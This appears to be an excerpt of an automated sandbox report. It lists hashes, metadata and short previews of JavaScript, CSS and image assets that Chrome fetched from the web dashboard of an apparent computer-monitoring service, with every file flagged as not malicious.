                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (773)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):774
                                                                                                                                                                                                                                                          Entropy (8bit):4.740473361173796
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:LXHnC5XfdkKVOHVOFkBgj4M4lH7858pE2k1SGdXyY7:jHCJfdlVOHVOFk44M4lHoOpSX9
                                                                                                                                                                                                                                                          MD5:C7296BD66C57AFFFAF695D2BE2EB436C
                                                                                                                                                                                                                                                          SHA1:D616816FE7D6DC660D731F17049741D0F5253573
                                                                                                                                                                                                                                                          SHA-256:1F17097282D14F7642E97BEDB6F8CDB10DDFFA20029AAAB50A51D397CE8DF34A
                                                                                                                                                                                                                                                          SHA-512:CEB26AA02C6476DF4EAF30C933F99C14EC93BF6A8A418B16762501611C94AD9179F36B81C3CE120368F101DE0630A4497A2566009350E8EC4F1DDF120C89C056
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/en-ef960fb7.js
                                                                                                                                                                                                                                                          Preview:const e="Register",o="Email",t="Password",s="Login",a={"Welcome Back":"Welcome Back","Sign In with Email":"Sign In with Email","No account?":"No account?",Register:e,Email:o,Password:t,Login:s,"Forgot password?":"Forgot password?","This email cannot be used. Please try another one.":"This email cannot be used. Please try another one.","Account does not exists":"Account does not exists","Incorrect password":"Incorrect password","Success! Getting data...":"Success! Getting data...","Password Field cannot be empty":"Password Field cannot be empty","E-mail Field cannot be empty":"E-mail Field cannot be empty","Field cannot be empty":"Field cannot be empty","Create a password":"Create a password"};export{o as Email,s as Login,t as Password,e as Register,a as default};.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:PNG image data, 184 x 184, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3029
                                                                                                                                                                                                                                                          Entropy (8bit):7.775466271259918
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:trqMHw1fogNoolwWy7d/fB/yKv8EwIgr4/0aMsVYU39z9p39AWToe8JhKtbmrLNV:tGAYfTlYH/Bv8dZc/04VYA9n3eWb8Ho6
                                                                                                                                                                                                                                                          MD5:175BFAD4569B48687A15D43A4E9BB617
                                                                                                                                                                                                                                                          SHA1:E28A5AC7818D8ACEDA0D2DE2C20DD922923C3BA5
                                                                                                                                                                                                                                                          SHA-256:F97E3C0058E3352D1F3789F40CB76DBF2C6C085AFA7535BD38F4970F884B2A45
                                                                                                                                                                                                                                                          SHA-512:658CC310C2A8FDBB32D48487CC7373B7D559AE55CB566C3669724F71ED9D86108F63E7A42B191A2A70CBCA47960E2591F7353261DCF5F0556AEDF1AB9F2D1501
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............P3&.....gAMA......a.....pHYs..!7..!7.3X.z....tEXtSoftware.paint.net 4.1.6.N.....SIDATx^..q.F....C....C..NeI....@.@.`......C....n......nw.3..y_.W.jqw...1..w........uY(.e.7.......-.....2.e.<.V....GX....y...Z.pZ.2o.aQ+.Nk[..#,je.im.y.E..8.m.7.......-.....2.e.<.V....GX.........OtN....@.y...Z].O.yG...e....-.y.E..8....0.$4.8...NB...0.$4.8...NB...0.$4.8...NB...0.$4.8...NB...0.$4.8...NB...0.$4.8...NB...0.$4.8...NB...0.$4.8...NB...0.$4.x0...O.........?=......+..40..H..sZ..6.........0.A..9..p..|..\R.~.o...<.i]...U..d.....@nM..;...0..H;....NC.0.x..;...-.....v..P-.....2....C.0.x.R..B...[..<.2.K..6hlW-.....A;...E.....e...-..3[..<0.....W9+..a.'!m.....:[..O.L-..>13.0.8Y...0...".0.8y..-..NT...0...H-..N...0...zma.6..?..GX...Ao-..2o.aQ+.>...07-.....2...a..-.....2.1.}.k.S..#,je.cqmaz...y.E..x\.~.).....z..|..........y...Z.._..!y.."oG.9g.0e.<..=...,W..].'.Z.2o.aQ........E....GX.Z#.WedH.....-L.7....f.7.....Z.2o.aQk..S..la.bO.S..
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (612)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):613
                                                                                                                                                                                                                                                          Entropy (8bit):5.08267772798313
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:tGYt6XJqt4oiYk5xURvnYgdMVB1K7xNFn40EffoCT/evn:tGYt6XYt4oiYkXURvn7MRwxjifZ7ev
                                                                                                                                                                                                                                                          MD5:2DAF2E8244A82CE2D18896703255F110
                                                                                                                                                                                                                                                          SHA1:256AFE217B8C4014D87643C68AE6D53FA7DF59F5
                                                                                                                                                                                                                                                          SHA-256:7299EB78A78C169241ADE88D784BAE2EA7207E00CBC18A98C35DB237DD0EB144
                                                                                                                                                                                                                                                          SHA-512:B7BFCC34C3639A5B6A68E9D190D83894686413FCFA1E3242809D3F4ED6697BB25B2547176ECD03044753945A0E769CF513D61C69F274DE6926DD7BFF5B0229AD
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.js
                                                                                                                                                                                                                                                          Preview:import{d as p,c as r,a as e,o as t,b as c,t as u,n as l,e as f,U as d}from"./index-004f4025.js";const k=p({__name:"Text",props:{oneRow:{type:Boolean,default:!1},bold:{type:Boolean,default:!1},text:{},size:{default:"sm"},color:{default:"default"},uppercase:{type:Boolean,default:!1},hoverLink:{type:Boolean,default:!1}},setup(n){const a=n,o=r(()=>[e.text,e[a.size],e[a.color],{[e.bold]:a.bold,[e.uppercase]:a.uppercase,[e.hoverLink]:a.hoverLink}]);return(s,i)=>s.oneRow?(t(),f(d,{key:1,class:l(o.value),text:s.text},null,8,["class","text"])):(t(),c("span",{key:0,class:l(o.value)},u(s.text),3))}});export{k as _};.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1097)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1098
                                                                                                                                                                                                                                                          Entropy (8bit):4.801883004252557
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:pIDlt6Rqz5Rqz9cujSPhQsF+a2cG2DB/pzOpzDErt7:d0EY/BOBDG
                                                                                                                                                                                                                                                          MD5:01CEB283B00E59B25F2283787D5FBCFC
                                                                                                                                                                                                                                                          SHA1:12503D8DC4A1904F39A2BE105CD2BEF151464B80
                                                                                                                                                                                                                                                          SHA-256:EFAC77214359588EE656CE42F52A545423480B5C194894B4B3237DFA27C0BF4B
                                                                                                                                                                                                                                                          SHA-512:533636F230CE0236E8E248CB0A26593DEBBD6B88DB6E054822E831203EE15EDE59A00D01FCE8FE422535E826F6F4B865599FCB9E7FF6EF0593B0B2E736B0B273
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:const o="convenient",e="Main",n={"The license period has expired":"The license period has expired","The trial period is expired":"The trial period is expired","Your data is safe":"Your data is safe","Please purchase a license to access your data":"Please purchase a license to access your data","Buy 1 PC for 12 months for $":"Buy 1 PC for 12 months for $","DISCOUNT {0}":"DISCOUNT {0}","Computers count":"Computers count","101 and more - ":"101 and more - ","21-100 PC - ":"21-100 PC - ","1PC per month":"1PC per month",convenient:o,"3 Months":"3 Months","6 Months":"6 Months","12 Months":"12 Months","24 Months":"24 Months","1PC for 12 Months":"1PC for 12 Months","1PC for 12 Months +":"1PC for 12 Months +","Do you have a discount coupon?":"Do you have a discount coupon?","Discount coupon":"Discount coupon","Coupon is applied":"Coupon is applied","Apply coupon":"Apply coupon","Includes Screen recording, Webcam recording, Face recognition, Call recording":"Includes Screen recording, Webcam rec
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 1269714
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):431923
                                                                                                                                                                                                                                                          Entropy (8bit):7.998299964648713
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:12288:P1cMzxy3PTXjtB9x4MBGbeULSeqpYsZ18yGeHa+:P1cmyPntBr4aXeS7prZXr
                                                                                                                                                                                                                                                          MD5:9616FB894D93BDC7CC828B297B8D4389
                                                                                                                                                                                                                                                          SHA1:160666E391BDE76FFCAAF004B25236CBBD4C6C7E
                                                                                                                                                                                                                                                          SHA-256:C489F83CB93D7D8AC95FBC0C51D2C9690945539452B1965FE05557E643A01A83
                                                                                                                                                                                                                                                          SHA-512:8D89910B126F30D10CD601B70D7FE11597DFB00983D824DE4A5B5B5A3E80E9047BDB5FBA5C35122155E73B19C9C5366147D887C09CADFA202E0A57475DBD73B7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............s.F...U$.VK.a......Y.,..N...E.P$$... %3...~.../.)y6..u.l.h4.......W....A....|0...g.I......}.....'.d..u7F....w`%7.dq.....<.|......|..g.yxv../.t~.J...I6....T-7...|9....f.(......>j4R..v.l1..G....r....QL.;.Y....\w..x4..h....Q9o......N..N..._7...p1.T...F.5...}V...r.q.~_..|..Yw<n..z;..l....l.&........F..i...Y...T}..G.b...A"...b4.j..VU.P..N.8.o.a^...y..M...yu....v......moO.E.S.Q4......\..g.V....p.3...Yvs.v..(wF.y~./...~..jOZI....,..P.G.Ww...V...`V......h..-..1.=d.G.q.....6k.&..b.7.{o.'.dyY,.S\..t....>...F2..P..N.N>....l.I...,...g.|pA....Zww.f.......#.].....2.''..v~...[7....I.o.....{Y.r3.&..C.%.v.Jk........N..u...{..<.nf.I.g..f..9e.......7...8...}.....ht.......7..f5.....y..L.7WMv..J........f.]../.IS..06..5wvv..V+.X].J....t.Z.W....H....\...Uoe....B.W_.9..a.'.y.....e...../.....k~1*wz.E......gW.h..$qU.g.|.Z4...@......\i_.e..vNG.aS.PUu?`.z.U.w_...h~.ZU%..w...fmo.l.lvoo=..!.......BN...Y.=...3#.m..j..i..i....
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):296
                                                                                                                                                                                                                                                          Entropy (8bit):5.209985161631545
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:ppuXX6C8Vk2GeLETF41DCuOVNMEXXZdeW6Gej1VNDYLZzo+q:BC8Vk2Gew4ZCuUtoGexVNDmZct
                                                                                                                                                                                                                                                          MD5:BC014647DE85B8D6EE3D5919C12A1657
                                                                                                                                                                                                                                                          SHA1:A0B345B75F9C992DAEFBF3592BAD068D0512E22E
                                                                                                                                                                                                                                                          SHA-256:7E7C447A5F70750D599F18780DCFFA85F4A637F3EB7BBB889532AC4622440595
                                                                                                                                                                                                                                                          SHA-512:D366D8B3201295AD0C61EF9455DE5FB939618FE277D0A13ECA95493625ECBC2546604AEBCC76951E893C0205EE38BEAF93233E8510599657504D5C473A7C7375
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/index-7e7c447a.css
                                                                                                                                                                                                                                                          Preview:.MWPQFMkT{display:flex;flex-direction:column;align-items:center;justify-content:center}.Rjzfav6N,.d8NUNeIk{margin-bottom:10px}.cDDReZ-k{width:100%;display:flex;flex-direction:column;gap:10px;justify-content:center;align-items:center;margin-bottom:20px}.lQe5UjYN{width:100%}.-s8ttL3y{width:200px}.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (4588)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4589
                                                                                                                                                                                                                                                          Entropy (8bit):5.4532831416501
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:hXzpjic4csuWotv1CFfaIpNvsY4rE0Q37oXZjUEvUolEw:hDpjiUWy1jIvkY4rE0QroXZQoOw
                                                                                                                                                                                                                                                          MD5:758C356F96FCFB65FB34300BECE665AF
                                                                                                                                                                                                                                                          SHA1:060C8F8FBD51C1DBE9E72ECFCDA3E6A25FF2C4C6
                                                                                                                                                                                                                                                          SHA-256:B20D853A66A3EC652CB968F2FE91FB1BC62A70B19D28D6022618D1CC954284E9
                                                                                                                                                                                                                                                          SHA-512:32CAE5393CA5585CF1252D8C287CF193FCC973E7BE81D6497A061A3EBA26CCC23689188764AAAC8572DD5C4672DC72446B91A5FBF1D1824E1A84D8343E960557
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:import{J as T,$ as L,F as y,aG as _,E as w,aM as b,aA as R,c as C,p as F,at as c,R as M,av as f,au as S,aw as u,ax as h,ac as N}from"./index-004f4025.js";function lt(){var p;const t=T(),e=L(),r=y(),a=_(),{setDefaults:o}=w(),s=((p=r.program)==null?void 0:p.name)===b.CLEVER,{pushRoute:n}=w(),{redirectLogic:d}=R(),g=C(()=>{var i,l;return(l=(i=e.account)==null?void 0:i.dashboard_settings)==null?void 0:l.admin}),m=C(()=>e.fetchAccountStatus.state==="pending"),A=async i=>{var l;if(i&&!localStorage.getItem(c.ACCOUNT)){a.changeIsLoading(!0);return}if(!i){if(s&&e.isPro32User&&!((l=e.account)!=null&&l.pro32key)&&!g.value){n({name:M.LICENSE_KEY});return}const P=d();await t.fetchComputers(),await n({name:P})}};F(m,async i=>{o(),await A(i)})}async function v(t){const{data:e}=await f.post("/api/account/auth?expand=api_token",t);return e}const V=S("twoFactor",{state:()=>({fetchTwoFactorStatus:{...u},twoFactorId:null}),actions:{setTwoFactorId(t){this.twoFactorId=t},async fetchTwoFactor(){await h(this.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (4588)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):4589
                                                                                                                                                                                                                                                          Entropy (8bit):5.4532831416501
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:hXzpjic4csuWotv1CFfaIpNvsY4rE0Q37oXZjUEvUolEw:hDpjiUWy1jIvkY4rE0QroXZQoOw
                                                                                                                                                                                                                                                          MD5:758C356F96FCFB65FB34300BECE665AF
                                                                                                                                                                                                                                                          SHA1:060C8F8FBD51C1DBE9E72ECFCDA3E6A25FF2C4C6
                                                                                                                                                                                                                                                          SHA-256:B20D853A66A3EC652CB968F2FE91FB1BC62A70B19D28D6022618D1CC954284E9
                                                                                                                                                                                                                                                          SHA-512:32CAE5393CA5585CF1252D8C287CF193FCC973E7BE81D6497A061A3EBA26CCC23689188764AAAC8572DD5C4672DC72446B91A5FBF1D1824E1A84D8343E960557
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/ConfirmPhoneModal.module-3f369b32.js
                                                                                                                                                                                                                                                          Preview:import{J as T,$ as L,F as y,aG as _,E as w,aM as b,aA as R,c as C,p as F,at as c,R as M,av as f,au as S,aw as u,ax as h,ac as N}from"./index-004f4025.js";function lt(){var p;const t=T(),e=L(),r=y(),a=_(),{setDefaults:o}=w(),s=((p=r.program)==null?void 0:p.name)===b.CLEVER,{pushRoute:n}=w(),{redirectLogic:d}=R(),g=C(()=>{var i,l;return(l=(i=e.account)==null?void 0:i.dashboard_settings)==null?void 0:l.admin}),m=C(()=>e.fetchAccountStatus.state==="pending"),A=async i=>{var l;if(i&&!localStorage.getItem(c.ACCOUNT)){a.changeIsLoading(!0);return}if(!i){if(s&&e.isPro32User&&!((l=e.account)!=null&&l.pro32key)&&!g.value){n({name:M.LICENSE_KEY});return}const P=d();await t.fetchComputers(),await n({name:P})}};F(m,async i=>{o(),await A(i)})}async function v(t){const{data:e}=await f.post("/api/account/auth?expand=api_token",t);return e}const V=S("twoFactor",{state:()=>({fetchTwoFactorStatus:{...u},twoFactorId:null}),actions:{setTwoFactorId(t){this.twoFactorId=t},async fetchTwoFactor(){await h(this.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (773)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):774
                                                                                                                                                                                                                                                          Entropy (8bit):4.740473361173796
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:LXHnC5XfdkKVOHVOFkBgj4M4lH7858pE2k1SGdXyY7:jHCJfdlVOHVOFk44M4lHoOpSX9
                                                                                                                                                                                                                                                          MD5:C7296BD66C57AFFFAF695D2BE2EB436C
                                                                                                                                                                                                                                                          SHA1:D616816FE7D6DC660D731F17049741D0F5253573
                                                                                                                                                                                                                                                          SHA-256:1F17097282D14F7642E97BEDB6F8CDB10DDFFA20029AAAB50A51D397CE8DF34A
                                                                                                                                                                                                                                                          SHA-512:CEB26AA02C6476DF4EAF30C933F99C14EC93BF6A8A418B16762501611C94AD9179F36B81C3CE120368F101DE0630A4497A2566009350E8EC4F1DDF120C89C056
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:const e="Register",o="Email",t="Password",s="Login",a={"Welcome Back":"Welcome Back","Sign In with Email":"Sign In with Email","No account?":"No account?",Register:e,Email:o,Password:t,Login:s,"Forgot password?":"Forgot password?","This email cannot be used. Please try another one.":"This email cannot be used. Please try another one.","Account does not exists":"Account does not exists","Incorrect password":"Incorrect password","Success! Getting data...":"Success! Getting data...","Password Field cannot be empty":"Password Field cannot be empty","E-mail Field cannot be empty":"E-mail Field cannot be empty","Field cannot be empty":"Field cannot be empty","Create a password":"Create a password"};export{o as Email,s as Login,t as Password,e as Register,a as default};.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:Java source, Unicode text, UTF-8 text, with very long lines (731)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):733
                                                                                                                                                                                                                                                          Entropy (8bit):5.333043890106064
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:rVEeOb9zMiNkI9dEkAS4c/EoanGYWZ1ryZ1dqdlZdzSLWPIoBsUNdbHBG9:ruj9zhNkyEW3MoaGh+nodZzSLWPbN18
                                                                                                                                                                                                                                                          MD5:C20426806474BC5F7DF377451D78F70C
                                                                                                                                                                                                                                                          SHA1:30B675794EC6F2576F7C27EBE24D8F5AC647E417
                                                                                                                                                                                                                                                          SHA-256:188D59F20F833D8FB65E71959214B05CD41E5B1312AEA55196948ED28AAFA2BD
                                                                                                                                                                                                                                                          SHA-512:E7648E2F98E81D4839540A222071CF7954C117004A4F502758556546B2C03AC62200616EF02B40C49D647445FC6B00902B2B4F0275BF4368DE8BEB7B529F7CA7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js
                                                                                                                                                                                                                                                          Preview:import{E as u,s as l,at as i,p as m,d as o,o as r,b as _,r as p,n as f,u as c,g,e as d}from"./index-004f4025.js";import{c as h}from"./ConfirmPhoneModal.module-3f369b32.js";import{_ as E}from"./Text.vue_vue_type_script_setup_true_lang-a664542d.js";function k(a,e){const{pushQueries:s,queryEmail:n}=u();l(()=>{const t=localStorage.getItem(i.EMAIL);t&&(s({email:t}),e||a(t))}),m(n,t=>{typeof t=="string"&&!e&&a(t)})}const B=o({__name:"AuthTemplate",setup(a){return(e,s)=>(r(),_("div",{class:f([c(h).authTemplate])},[p(e.$slots,"default")],2))}}),C=o({__name:"Copyright",setup(a){const{t:e}=g();return(s,n)=>(r(),d(E,{text:`${c(e)(". Online Monitoring")} ${new Date().getFullYear()}`},null,8,["text"]))}});export{C as _,B as a,k as u};.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 1269714
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):431923
                                                                                                                                                                                                                                                          Entropy (8bit):7.998299964648713
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:12288:P1cMzxy3PTXjtB9x4MBGbeULSeqpYsZ18yGeHa+:P1cmyPntBr4aXeS7prZXr
                                                                                                                                                                                                                                                          MD5:9616FB894D93BDC7CC828B297B8D4389
                                                                                                                                                                                                                                                          SHA1:160666E391BDE76FFCAAF004B25236CBBD4C6C7E
                                                                                                                                                                                                                                                          SHA-256:C489F83CB93D7D8AC95FBC0C51D2C9690945539452B1965FE05557E643A01A83
                                                                                                                                                                                                                                                          SHA-512:8D89910B126F30D10CD601B70D7FE11597DFB00983D824DE4A5B5B5A3E80E9047BDB5FBA5C35122155E73B19C9C5366147D887C09CADFA202E0A57475DBD73B7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.js
                                                                                                                                                                                                                                                          Preview:............s.F...U$.VK.a......Y.,..N...E.P$$... %3...~.../.)y6..u.l.h4.......W....A....|0...g.I......}.....'.d..u7F....w`%7.dq.....<.|......|..g.yxv../.t~.J...I6....T-7...|9....f.(......>j4R..v.l1..G....r....QL.;.Y....\w..x4..h....Q9o......N..N..._7...p1.T...F.5...}V...r.q.~_..|..Yw<n..z;..l....l.&........F..i...Y...T}..G.b...A"...b4.j..VU.P..N.8.o.a^...y..M...yu....v......moO.E.S.Q4......\..g.V....p.3...Yvs.v..(wF.y~./...~..jOZI....,..P.G.Ww...V...`V......h..-..1.=d.G.q.....6k.&..b.7.{o.'.dyY,.S\..t....>...F2..P..N.N>....l.I...,...g.|pA....Zww.f.......#.].....2.''..v~...[7....I.o.....{Y.r3.&..C.%.v.Jk........N..u...{..<.nf.I.g..f..9e.......7...8...}.....ht.......7..f5.....y..L.7WMv..J........f.]../.IS..06..5wvv..V+.X].J....t.Z.W....H....\...Uoe....B.W_.9..a.'.y.....e...../.....k~1*wz.E......gW.h..$qU.g.|.Z4...@......\i_.e..vNG.aS.PUu?`.z.U.w_...h~.ZU%..w...fmo.l.lvoo=..!.......BN...Y.=...3#.m..j..i..i....
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1512)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):1513
                                                                                                                                                                                                                                                          Entropy (8bit):5.364910493353474
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:LO+S3cnRBofRI9CD2n13n1cmgg4u0x0onlVbFn1tcD/wFn1Km5eN8Wocl:LO+ecacCDMteBgs0ilK/Y0D7n
                                                                                                                                                                                                                                                          MD5:D5296A2D8854493E01C420A5CE74E107
                                                                                                                                                                                                                                                          SHA1:8C26E4109BEFD162A553D1243FDD46177249827F
                                                                                                                                                                                                                                                          SHA-256:04FFDA9483449F07429EBF4A61BC348936D326C88FE1504DE8D90830A7E73097
                                                                                                                                                                                                                                                          SHA-512:2A58E5CEA2B8361C7E64A77241368B64E909858D966621C950046AA3194357F705597D561C7087754EB3E7560E38203A56F4C25B74D70A3D3DF7BCABDB38BDB5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/Modal-04ffda94.css
                                                                                                                                                                                                                                                          Preview:._5kL4TPdD{z-index:var(--z-modal-backdrop)}.eoPx-XfL{opacity:0}.-uFEEehb{position:fixed;width:100%;z-index:var(--z-modal-backdrop);height:100%;left:0;top:0;opacity:1;background-color:#00000080}.fMo3ZVEl{direction:rtl}._6sPwaxyC{position:fixed;top:50%;left:50%;transform:translate(-50%,-50%);min-width:250px;display:flex;max-width:85%;box-shadow:var(--shadow);z-index:var(--z-modal);transform-origin:center center;border-radius:10px;background-color:#fff;cursor:auto;max-height:85%}@media screen and (max-width: 768px){._6sPwaxyC{width:max-content}}@media screen and (max-width: 480px){._6sPwaxyC{overflow-x:hidden;overflow-y:scroll;max-width:100%;max-height:98%;width:100%;bottom:0;left:0;top:initial;transform:translate(0);border-radius:10px 10px 0 0;padding:50px 0 10px;height:-webkit-fill-available}}.LL0-2zyj{position:absolute;right:-40px;top:-35px;width:50px;height:50px;transition:.3s;display:flex;justify-content:center;align-items:center;cursor:pointer}@media screen and (max-width: 480px){.L
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):120
                                                                                                                                                                                                                                                          Entropy (8bit):4.87560060165103
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:lHkiDkYHsh9J55ZrKAAdGaOiDpEqxALR4QHEXxB+N:lEi4YHGrMdGaOiaqxWqgoB0
                                                                                                                                                                                                                                                          MD5:62BC1BD7189B2B28A9985E0C3661BC91
                                                                                                                                                                                                                                                          SHA1:33AC2D40B9C973C0D040E08AFF37F072D2C5E136
                                                                                                                                                                                                                                                          SHA-256:98A603E044A3472D373EF9C4F3A563E7596FF8F9C43620409EE5E74FBF45CC28
                                                                                                                                                                                                                                                          SHA-512:47B95930336340314410E9A9D30C71E74E6191E3C64FD39DA973B561BABCD987647B40B7B2587B047A763F5D765D6CD4D83EE037CC63F02EA3525D692AAA281D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/ButtonText.module-c769b9ae.js
                                                                                                                                                                                                                                                          Preview:const t="vaJg7XGf",o="mtxFuuqo",n="MtAUm4rd",x={"button-text":"vaJg7XGf",buttonText:t,text:o,primary:n};export{x as c};.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3064)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):3065
                                                                                                                                                                                                                                                          Entropy (8bit):5.324905264285846
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:uhzv2QuOpwb+/+F16axib+bjFf8Wn5R8sxqNX9Q:u12V+wi+6axiibjz5R8sCX9Q
                                                                                                                                                                                                                                                          MD5:18A06D9DBE56451E74AF84EFCBBD5184
                                                                                                                                                                                                                                                          SHA1:839EE80D333FA137025CBFA0500D2ACAF83C00E8
                                                                                                                                                                                                                                                          SHA-256:342125717F6112F7A8D8246360CB83525C086CDE797A1A9305021AD8D6A4AA25
                                                                                                                                                                                                                                                          SHA-512:6941A1F58FBB689E96C9B9B54C1280646AD0357336E95A39FED02DBBD5FAC911E5552C4E7674A1F6BF0E180CA3960CC1AE25006A48CC241CABD8859345527A97
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          URL:https://cdn.cdndownload.net/dashboard30/assets/Input-34212571.css
